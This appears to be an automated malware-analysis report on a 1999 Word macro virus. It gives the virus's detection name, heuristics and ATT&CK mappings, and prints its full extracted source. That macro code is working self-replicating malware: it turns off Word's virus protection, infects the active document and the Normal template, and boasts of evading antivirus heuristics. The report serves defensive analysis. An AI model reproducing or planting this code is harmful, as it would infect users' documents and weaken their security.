MALICIOUS
140
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a legacy Word document containing a WordBasic macro designed to infect other documents. The AutoClose macro is designed to copy its own code to the active document and the Normal template, effectively spreading the macro. While a payload to set a document password exists, it is intentionally never activated. The ClamAV detection 'Doc.Trojan.Ever-1' and the presence of the AutoClose macro strongly suggest malicious intent.
Heuristics 4
-
ClamAV: Doc.Trojan.Ever-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Ever-1
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Auto_Close macro high OLE_VBA_AUTOCLOSEAuto_Close macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1328 bytes |
SHA-256: 944ef8ebc8e2ba4cfd5e5e6c91c26aaff2b7b98e02ef129241422511a4c86545 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True ' N3v3R v1.0 by SPo0Ky[CB], 21st June 1999 ' SR-1 Compatible MS-Word bug with 5 lines of code. ' Includes "the basic stuff", a small payload which ' would set a random password (though it never gets activated), ' and as a bonus it is even undetectable by F-Prot's and AVP's ' heuristics :-) Sub AutoClose() Options.VirusProtection = False ' the basic stuff you asked for :-) x = ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(1, 100) ' gets the virus's code If ActiveDocument.VBProject.VBComponents(1).CodeModule.CountOfLines = 0 Then ActiveDocument.VBProject.VBComponents(1).CodeModule.InsertLines 1, x ' infection check and infection of the activedocument If NormalTemplate.VBProject.VBComponents(1).CodeModule.CountOfLines = 0 Then NormalTemplate.VBProject.VBComponents(1).CodeModule.InsertLines 1, x ' infection check and infection of the normaltemplate If Day(Now) = "N3v3R" Then ActiveDocument.Password = ActiveDocument.Words(1) ' a payload which will never get activated, see it as a payload which actually just wastes time and space! :-) End Sub |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.